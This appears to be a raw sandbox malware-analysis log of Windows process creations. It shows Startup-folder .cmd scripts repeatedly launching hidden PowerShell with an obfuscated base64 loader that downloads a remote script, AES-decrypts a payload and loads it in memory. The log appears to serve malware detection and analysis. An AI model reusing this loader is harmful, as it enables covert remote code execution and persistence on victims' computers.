Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5
BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5
BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" "
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
